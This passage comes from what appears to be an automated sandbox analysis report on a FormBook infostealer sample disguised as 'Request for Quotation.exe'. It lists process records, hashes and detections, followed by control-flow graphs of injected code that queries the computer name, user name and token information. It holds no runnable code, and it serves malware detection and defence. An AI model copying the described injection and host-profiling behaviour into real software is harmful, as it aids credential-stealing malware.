                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\snmptrap.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\snmptrap.exe
                                      Imagebase:0x140000000
                                      File size:1'515'520 bytes
                                      MD5 hash:612475391C7276C2E25FF0A0CCAD3C66
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:18
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\Spectrum.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\spectrum.exe
                                      Imagebase:0x140000000
                                      File size:1'455'616 bytes
                                      MD5 hash:7708CE35FBFD8CB3DA18C4C0207016DB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:19
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Request for Quotation.exe"
                                      Imagebase:0x710000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:10:40:09
                                      Start date:10/12/2024
                                      Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                      Imagebase:0x140000000
                                      File size:1'880'064 bytes
                                      MD5 hash:7765865BFBC2AA0361E0E3A618C590B8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:4%
                                        Dynamic/Decrypted Code Coverage:97.8%
                                        Signature Coverage:8.6%
                                        Total number of Nodes:93
                                        Total number of Limit Nodes:5
                                        execution_graph 5638 c35be2 5639 c35bfc CloseHandle 5638->5639 5641 c35be7 5638->5641 5639->5641 5642 c35b42 5643 c35b07 5642->5643 5643->5642 5644 c35b68 5643->5644 5645 c35cdf CreateThread 5643->5645 5646 c35c01 5645->5646 5649 c354a0 5645->5649 5647 c35c03 CloseHandle 5646->5647 5648 c35c20 5646->5648 5647->5644 5650 c354b5 5649->5650 5651 c35522 VirtualAlloc 5650->5651 5651->5650 5658 c35b00 5659 c35bba 5658->5659 5666 c452c0 5659->5666 5661 c35bc7 5665 c35bde 5661->5665 5671 c50080 5661->5671 5667 c452c6 5666->5667 5670 c452ce 5666->5670 5667->5670 5685 c3e050 5667->5685 5670->5661 5677 c50089 5671->5677 5672 c503e0 GetComputerNameW 5672->5677 5673 c50181 VirtualFree 5673->5677 5674 c3e050 VirtualAlloc 5674->5677 5675 c503bf GetUserNameW 5675->5677 5676 c504d6 GetComputerNameW 5676->5677 5677->5672 5677->5673 5677->5674 5677->5675 5677->5676 5678 c35c7b 5677->5678 5679 c38070 5678->5679 5681 c38075 5679->5681 5680 c38186 CloseHandle 5680->5681 5681->5680 5682 c381ad GetTokenInformation 5681->5682 5683 c380ca GetTokenInformation 5681->5683 5684 c380a7 5681->5684 5682->5681 5683->5681 5684->5665 5686 c3e0c3 5685->5686 5687 c3e0d8 VirtualAlloc 5686->5687 5687->5686 5708 c35860 5709 c452c0 VirtualAlloc 5708->5709 5710 c35869 5709->5710 5711 c50080 5 API calls 5710->5711 5712 c3587d 5711->5712 5713 c38070 3 API calls 5712->5713 5714 c35870 5713->5714 5688 c35b87 CreateThread 5689 c35b1c 5688->5689 5697 c35810 5688->5697 5690 c35d0d 5689->5690 5692 c35cdf CreateThread 5689->5692 5693 c35c01 5689->5693 5691 c35c03 CloseHandle 5695 c35d37 5691->5695 5692->5693 5696 c354a0 VirtualAlloc 5692->5696 5693->5691 5694 c35c20 5693->5694 5698 c35822 5697->5698 5699 c354c4 5700 c354c5 5699->5700 5701 c35522 VirtualAlloc 5700->5701 5701->5700 5758 c35b09 5759 c35b16 5758->5759 5760 c35d0d 5759->5760 5761 c35c01 5759->5761 5763 c35cdf CreateThread 5759->5763 5762 c35c03 CloseHandle 5761->5762 5765 c35c20 5761->5765 5764 c35d37 5762->5764 5763->5761 5766 c354a0 VirtualAlloc 5763->5766 5715 c355ef 5717 c355ac 5715->5717 5718 c355e4 5717->5718 5719 c53870 5717->5719 5721 c53876 5719->5721 5722 c53893 5721->5722 5723 c53720 5721->5723 5722->5717 5726 c40c42 5723->5726 5724 c537dd 5724->5722 5725 c3e050 VirtualAlloc 5725->5726 5726->5723 5726->5724 5726->5725 5652 c381b1 5657 c38075 5652->5657 5653 c38186 CloseHandle 5653->5657 5654 c380ca GetTokenInformation 5654->5657 5655 c381ad GetTokenInformation 5655->5657 5656 c380a7 5657->5653 5657->5654 5657->5655 5657->5656 5702 c38090 5705 c38075 5702->5705 5703 c38186 CloseHandle 5703->5705 5704 c380ca GetTokenInformation 5704->5705 5705->5703 5705->5704 5706 c380a7 5705->5706 5707 c381ad GetTokenInformation 5705->5707 5707->5705 5727 c357f0 5728 c355ac 5727->5728 5729 c53870 VirtualAlloc 5728->5729 5730 c355e4 5728->5730 5729->5728

                                        Executed Functions

                                        Function 00C50080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 c50080-c50286 2 c5028c 0->2 3 c50099-c50575 0->3 5 c50445 2->5 7 c50155 3->7 8 c5057b 3->8 5->3 6 c5044b-c50457 5->6 9 c50458-c50472 GetComputerNameW 6->9 11 c502ef-c50495 call c3e050 * 2 7->11 8->7 10 c50581-c50587 8->10 15 c5024c-c50253 9->15 16 c503ee-c503f4 9->16 13 c5058b 10->13 11->9 55 c5043e 11->55 18 c50181 VirtualFree 13->18 19 c5058c-c50591 13->19 23 c50255 15->23 24 c501e6 15->24 37 c500da-c5023f 16->37 38 c503fa 16->38 20 c501a8-c502ac call c67164 18->20 21 c50597 19->21 22 c504ab-c504af 19->22 27 c502b1-c502be 20->27 21->22 30 c5059d 21->30 48 c504c7 22->48 31 c502d3 23->31 24->27 28 c501ec-c50313 call c6715c 24->28 33 c502c4 27->33 34 c503bf-c503d9 GetUserNameW 27->34 52 c50318-c5031e 28->52 30->22 31->24 36 c502d9 31->36 33->34 43 c502ca 33->43 44 c50331 34->44 36->11 37->15 50 c50241-c5024a 37->50 38->37 45 c50400 38->45 43->31 53 c50337 44->53 54 c50171 44->54 51 c5b1ee-c5b49f 45->51 58 c504cc-c504e6 call c69970 GetComputerNameW 48->58 50->15 50->27 56 c50324 52->56 57 c50568-c5056b 52->57 53->54 61 c5033d 53->61 59 c50173 54->59 60 c5013f-c50146 54->60 55->5 56->57 64 c5032a 56->64 57->58 70 c50131 58->70 71 c504ec-c50514 58->71 66 c50230 59->66 60->13 62 c505d0-c505d9 61->62 62->51 64->44 66->48 67 c50236-c505c2 66->67 67->48 74 c505c8-c505c9 67->74 72 c50137 70->72 73 c50089-c5008c 70->73 71->57 72->73 77 c5013d 72->77 73->20 76 c50092 73->76 74->62 76->20 78 c50098 76->78 77->18 77->60 78->3
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: 2016ceaab3752c7d76ec6b6d76f55c8f77f73771e19e0cafb20109e37d0b3ad6
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: 8FD12535418F098BC728EF58CC467EAB7D1FBA0311F68461FDC56C3164DA749A8986C6
                                        Function 00C352A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 314 c352a0-c352a5 315 c352ab-c352f5 314->315 316 c3532e-c3533f 314->316 315->316 319 c352f7 315->319 320 c3536b-c35390 316->320 321 c353fe 319->321 327 c353c3 320->327 328 c35392-c3539a 320->328 323 c35404-c3540e 321->323 324 c70d4c-c70d4e 321->324 326 c35424 323->326 329 c3539b 326->329 330 c3542a 326->330 328->329 331 c35413-c35419 329->331 332 c3539d-c353a1 329->332 330->329 333 c35430-c35443 330->333 334 c352b0-c352b5 332->334 335 c353a7 332->335 335->334 336 c353ad 335->336 337 c353f3-c353f9 336->337 338 c353af-c353f1 336->338 337->321 341 c35322-c35328 337->341 338->331 338->337 342 c35355 341->342 343 c3532a 341->343 346 c352d1-c352e7 342->346 347 c352e8-c35363 342->347 343->342 344 c3532c 343->344 344->316 346->347 350 c353d1-c353d5 347->350 351 c35365 347->351 350->332 352 c353d7 350->352 351->350 353 c35367-c35369 351->353 355 c35400-c3540e 352->355 356 c3534b 352->356 353->320 355->326 356->355 357 c35351-c35353 356->357 357->342
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 00C353C4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: 4c4386b50d5bd3081784346ae7bda678ec785bae294d4bcb5eb72f0942df6c8f
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 00413AA183DED58FD36A432544643B17BD09B123E2F9D04D7D4E3CB0F2E1990E819766
                                        Function 00C38070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 c38070-c3817e 81 c38180 79->81 82 c3813d-c381a5 79->82 83 c38184 81->83 84 c3815f 81->84 97 c381a7 82->97 98 c381bd-c381ca 82->98 85 c38186 CloseHandle 83->85 86 c3818c-c38192 83->86 84->82 88 c38161 84->88 85->86 89 c38115-c38118 86->89 90 c38194 86->90 92 c38163-c38170 call c67164 88->92 95 c380a7 89->95 96 c38119-c3811a 89->96 90->89 93 c3819a 90->93 92->85 103 c38172 92->103 99 c3813c 93->99 96->95 101 c3811c 96->101 107 c380f3 98->107 108 c381d0 98->108 99->83 104 c3820f 101->104 103->86 105 c38215-c3821e 104->105 106 c3808e-c38096 104->106 105->106 116 c38224 105->116 106->83 106->95 109 c380f5 107->109 110 c3808c 107->110 117 c380c3 108->117 118 c381fe-c38201 GetTokenInformation 108->118 109->110 115 c38077 109->115 110->106 119 c381d7-c381de call c6715c 115->119 116->119 120 c38226 116->120 117->118 121 c380c9 117->121 118->104 127 c381b7 118->127 129 c381e3-c381e6 119->129 120->119 123 c38228-c382ee call c35d90 120->123 126 c380ca-c380d8 GetTokenInformation 121->126 146 c382f0 123->146 147 c3830c-c3831e 123->147 130 c3810f 126->130 127->104 132 c381b9-c381bb 127->132 129->126 142 c38089 129->142 133 c38111 130->133 134 c3812d 130->134 132->98 133->134 137 c38113 133->137 139 c38133 134->139 140 c380a8 134->140 137->89 139->99 141 c381ed-c381f0 139->141 144 c380aa-c380ad 140->144 148 c381f6 141->148 149 c380da-c380f1 141->149 142->126 145 c3808b 142->145 144->92 150 c380b3-c38203 144->150 145->110 146->147 153 c382f2 146->153 151 c382a1-c382ba call c35d90 call c3ec00 147->151 152 c38320 147->152 148->149 154 c381fc 148->154 149->144 150->92 160 c38209 150->160 151->152 158 c38322 152->158 159 c382f7-c382fc call c35d90 152->159 153->159 154->118 158->159 162 c38324-c38326 158->162 170 c38253-c38265 call c51280 159->170 171 c38302 159->171 166 c38328 162->166 172 c38335 166->172 173 c382df-c3832b 166->173 170->166 180 c3826b 170->180 171->170 175 c38308-c3830a 171->175 178 c3826e-c38285 172->178 173->172 179 c3832d-c38331 173->179 175->147 181 c38287 178->181 182 c3829b-c3829d 178->182 179->172 180->178 183 c38239 180->183 184 c3824c 181->184 182->151 183->166 185 c3823f-c38243 183->185 184->182 186 c3824e-c38252 184->186 185->159 185->184 186->178
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction ID: 1a9ea4b6acb718ff408c05b3e76dcc5c65ffb6d0b8460811c70eb63dc9e8e4c9
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: DA61677063CB459FCBA98B29881437E7BA0FB55350F68025AF467C32A0DF285E4DD752
                                        Function 00C35B09 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 c35b09-c35d01 192 c35d07 187->192 193 c35bb4 187->193 192->193 194 c35d0d 192->194 195 c35c01-c35d41 CloseHandle 193->195 196 c35cda-c35ce4 CreateThread 193->196 201 c35d43 195->201 202 c35d4b-c35d52 195->202 196->195 200 c35cea 196->200 200->195 203 c35cf0-c35cf6 200->203 206 c35d54 201->206 205 c35d45-c35d47 202->205 202->206 207 c35d49 205->207 208 c35d5f 205->208 207->202 207->208 210 c35d65 208->210 210->210
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: d5b88156e1bb2605f530ab7b94ef2fbd4ff5ce4cd0f64551362d6d87cf4d8771
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: E701F13053DF868FDB665725AD18379BBD0AB1832CF2805ABC497CA0D5DBA08B00E752
                                        Function 00C35910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 211 c35910-c35912 212 c35950-c35968 211->212 213 c35915-c35928 call c69970 211->213 212->213 214 c3596a 212->214 220 c359b8 call c50df0 213->220 216 c35970-c3597b 214->216 217 c3592f 214->217 221 c359d4 216->221 222 c3597d 216->222 217->213 219 c35931-c4072c 217->219 229 c40806-c40809 219->229 230 c40732-c40738 219->230 231 c359bd-c359c2 call c35d90 220->231 225 c3593b-c35a15 call c511a0 221->225 226 c359d8 221->226 222->221 227 c3597f-c35981 222->227 239 c359d9-c359de call c62190 226->239 228 c35983-c35a38 227->228 240 c35994-c3599c 228->240 241 c35a3e 228->241 245 c4079d-c407a6 229->245 237 c40800 230->237 238 c4073e 230->238 242 c359c7-c359ce 231->242 237->229 244 c406b3-c406b7 237->244 238->237 246 c40744-c40774 238->246 239->240 263 c359e0 239->263 252 c35a02 240->252 253 c3599e-c359f7 240->253 248 c35a2c-c35a34 241->248 249 c359d0 242->249 250 c35a1a-c35a26 242->250 244->245 255 c406bd 244->255 256 c40791-c40793 245->256 257 c407a8 245->257 260 c406d5-c406d9 246->260 261 c4077a-c4081c 246->261 248->239 249->250 258 c359d2-c359de 249->258 250->248 259 c359a1-c359b5 call c35e10 250->259 252->216 253->252 255->245 264 c406c3-c407fe 255->264 265 c407ca-c407cc 256->265 257->256 266 c407aa 257->266 258->240 258->263 259->220 282 c35a08-c35a0b 259->282 271 c406df 260->271 272 c406db 260->272 261->245 263->240 267 c359e2-c359ec 263->267 264->237 266->265 275 c35a62-c35a6e 267->275 276 c359ee-c359ef 267->276 271->245 272->271 278 c406dd 272->278 279 c35a70 275->279 280 c35a75-c35ab3 call c51280 275->280 276->228 281 c359f1 276->281 278->271 283 c4c0cc 278->283 279->280 287 c35a72 279->287 301 c35ab5 280->301 302 c35abb-c35ac9 280->302 281->213 282->240 284 c35a0d 282->284 285 c4c0ce-c4c0d0 283->285 286 c4c0e8-c4c102 283->286 293 c35932 284->293 294 c35991 284->294 290 c4c0d2-c4c0df 285->290 286->290 291 c4c104 286->291 287->280 298 c4c0e7 290->298 291->290 291->298 294->293 297 c35993 294->297 297->240 301->302 303 c35ab7-c35ab9 301->303 304 c35af2-c35af5 302->304 303->302 308 c35ad5 304->308 309 c35adb-c35adc 304->309 308->309 310 c35ad7-c35ad9 308->310 311 c35ae2 309->311 312 c35a45-c35a46 309->312 310->309 311->312 313 c35ae8 311->313 313->304
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: bf73485cd105b51094b2ac9823f28b9366ff857c8c2c9f2d077fa749a623d597
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 16F16A2072CF488FC769971D58413B973D2FB99310F58429EE85BC3296DE349D8AA386
                                        Function 00C35B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 358 c35b42-c35b47 call c35d90 360 c35b4c-c35b52 358->360 362 c35c42-c35c62 call c51280 360->362 363 c35b0d 360->363 378 c35c26 362->378 379 c35c14-c35cc0 362->379 363->362 364 c35b13 363->364 366 c35c8f-c35c96 364->366 368 c35c29 366->368 369 c35c98-c35c9a 366->369 371 c35cc2-c35cc9 call c352a0 368->371 372 c35c2f-c35c36 368->372 370 c35c9c 369->370 381 c35bfa 370->381 382 c35d0e-c35d18 370->382 387 c35ccb 371->387 388 c35c69 371->388 372->371 376 c35c3c 372->376 376->358 378->379 386 c35c28 378->386 379->371 381->382 389 c35c00 381->389 383 c35d54 382->383 384 c35d1a 382->384 392 c35d4b-c35d52 384->392 386->368 387->370 393 c35ccd 387->393 390 c35b68-c35d75 388->390 391 c35c6f 388->391 389->379 391->390 394 c35c75 391->394 392->383 395 c35d45-c35d47 392->395 393->370 396 c35ccf-c35ce4 CreateThread 393->396 394->366 398 c35d49 395->398 399 c35d5f 395->399 401 c35c01-c35c05 CloseHandle 396->401 402 c35cea 396->402 398->392 398->399 404 c35d65 399->404 407 c35d37-c35d41 401->407 402->401 405 c35cf0-c35cf6 402->405 404->404 407->392 409 c35d43 407->409 409->383
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: 42965785af1faf843d9b00051d729b98162cc595bfdd4548688d0347fcbf7532
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: BE21033023CF40CFCB69AB19E4887B4B7E1EB5D318F6811A68467CF1E2CA24CE449356
                                        Function 00C35B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 c35b87-c35d01 CreateThread 414 c35d07 410->414 415 c35bb4 410->415 414->415 416 c35d0d 414->416 417 c35c01-c35c05 CloseHandle 415->417 418 c35cda-c35ce4 CreateThread 415->418 421 c35d37-c35d41 417->421 418->417 422 c35cea 418->422 423 c35d43 421->423 424 c35d4b-c35d52 421->424 422->417 425 c35cf0-c35cf6 422->425 428 c35d54 423->428 427 c35d45-c35d47 424->427 424->428 429 c35d49 427->429 430 c35d5f 427->430 429->424 429->430 432 c35d65 430->432 432->432
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 0496a2221e3805dc4ff6d28e7fae752db1d092af1d1ec665e8d274587bd8a99f
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: F8E0863062DB444FDB599B24581071D7AE5EB88318F1501CEC44AD71D1CB694A058792
                                        Function 00C3599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 433 c3599b-c3599e 434 c359f7 433->434 435 c359b8 call c50df0 433->435 436 c35a02 434->436 439 c359bd-c359c2 call c35d90 435->439 441 c359d4 436->441 442 c3597d 436->442 443 c359c7-c359ce 439->443 444 c3593b-c35a15 call c511a0 441->444 445 c359d8 441->445 442->441 446 c3597f-c35981 442->446 448 c359d0 443->448 449 c35a1a-c35a26 443->449 456 c359d9-c359de call c62190 445->456 447 c35983-c35a38 446->447 457 c35994-c3599c 447->457 458 c35a3e 447->458 448->449 453 c359d2-c359de 448->453 454 c359a1-c359b5 call c35e10 449->454 455 c35a2c-c35a34 449->455 453->457 466 c359e0 453->466 454->435 467 c35a08-c35a0b 454->467 455->456 456->457 456->466 457->436 463 c3599e 457->463 458->455 463->434 466->457 469 c359e2-c359ec 466->469 467->457 468 c35a0d 467->468 475 c35932 468->475 476 c35991 468->476 471 c35a62-c35a6e 469->471 472 c359ee-c359ef 469->472 473 c35a70 471->473 474 c35a75-c35ab3 call c51280 471->474 472->447 477 c359f1 call c69970 472->477 473->474 479 c35a72 473->479 487 c35ab5 474->487 488 c35abb-c35ac9 474->488 476->475 478 c35993 476->478 477->435 478->457 479->474 487->488 489 c35ab7-c35ab9 487->489 490 c35af2-c35af5 488->490 489->488 494 c35ad5 490->494 495 c35adb-c35adc 490->495 494->495 496 c35ad7-c35ad9 494->496 497 c35ae2 495->497 498 c35a45-c35a46 495->498 496->495 497->498 499 c35ae8 497->499 499->490
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: 12e63d3664ec34d2d4f41083347c84974f02c51d16f4aba6dbc09d18fced6930
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 8401F97093DF80CFD727971954453796691F754320F280596905ECB192C8344F02B781
                                        Function 00C35BE2 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 500 c35be2-c35be5 501 c35be7-c35bef 500->501 502 c35bfc-c35c05 CloseHandle 500->502 503 c35ca3 501->503 509 c35d37-c35d41 502->509 506 c35ca5 503->506 507 c35ca8-c35cb3 call c35e10 503->507 506->507 510 c35ca7 506->510 514 c35d26 507->514 515 c35cb5 507->515 512 c35d43 509->512 513 c35d4b-c35d52 509->513 510->509 517 c35d54 512->517 516 c35d45-c35d47 513->516 513->517 521 c35d27-c35d2a call c35910 514->521 515->514 520 c35cb7 515->520 518 c35d49 516->518 519 c35d5f 516->519 518->513 518->519 525 c35d65 519->525 522 c35d5b-c35d5d 520->522 526 c35d2e 521->526 522->519 525->525 526->522
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1735053093.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_c30000_AppVClient.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: 3e03092d81f6ac67b15309d279fd7e6fb23dbb1020c46dbd1e4560ccf0aed7fb
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: D2E02B31538F0ACFEB54A61ADE092B522C0E73C3A8F2409218C03CB120E514CF06AB02
                                        Function 00C38090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 527 c38090-c38096 528 c38184 527->528 529 c38186 CloseHandle 528->529 530 c3818c-c38192 528->530 529->530 531 c38115-c38118 530->531 532 c38194 530->532 534 c380a7 531->534 535 c38119-c3811a 531->535 532->531 533 c3819a 532->533 536 c3813c 533->536 535->534 537 c3811c 535->537 536->528 538 c3820f 537->538 539 c38215-c3821e 538->539 540 c3808e-c38096 538->540 539->540 542 c38224 539->542 540->528 540->534 543 c381d7-c381e6 call c6715c 542->543 544 c38226 542->544 553 c380ca-c3810f GetTokenInformation 543->553 554 c38089 543->554 544->543 545 c38228-c382ee call c35d90 544->545 557 c382f0 545->557 558 c3830c-c3831e 545->558 562 c38111 553->562 563 c3812d 553->563 554->553 556 c3808b 554->556 566 c3808c 556->566 557->558 564 c382f2 557->564 560 c382a1-c382ba call c35d90 call c3ec00 558->560 561 c38320 558->561 560->561 567 c38322 561->567 568 c382f7-c382fc call c35d90 561->568 562->563 569 c38113 562->569 570 c38133 563->570 571 c380a8 563->571 564->568 566->540 567->568 574 c38324-c38326 567->574 589 c38253-c38265 call c51280 568->589 590 c38302 568->590 569->531 570->536 572 c381ed-c381f0 570->572 575 c380aa-c380ad 571->575 578 c381f6 572->578 579 c380da-c380f1 572->579 580 c38328 574->580 581 c38163-c38170 call c67164 575->581 582 c380b3-c38203 575->582 578->579 586 c381fc 578->586 579->575 592 c38335 580->592 593 c382df-c3832b 580->593 581->529 600 c38172 581->600 582->581 598 c38209 582->598 596 c381fe-c38201 GetTokenInformation 586->596 589->580 606 c3826b 589->606 590->589 597 c38308-c3830a 590->597 603 c3826e-c38285 592->603 593->592 605 c3832d-c38331 593->605 596->538 610 c381b7 596->610 597->558 600->530 608 c38287 603->608 609 c3829b-c3829d 603->609 605->592 606->603 611 c38239 606->611 612 c3824c 608->612 609->560 610->538 613 c381b9-c381ca 610->613 611->580 614 c3823f-c38243 611->614 612->609 615 c3824e-c38252 612->615 618 c380f3 613->618 619 c381d0 613->619 614->568 614->612 615->603 618->566 620 c380f5 618->620 619->596 625 c380c3 619->625 620->566 624 c38077 620->624 624->543 625->596 626 c380c9 625->626 626->553
                                        APIs
                                        Memory Dump Source
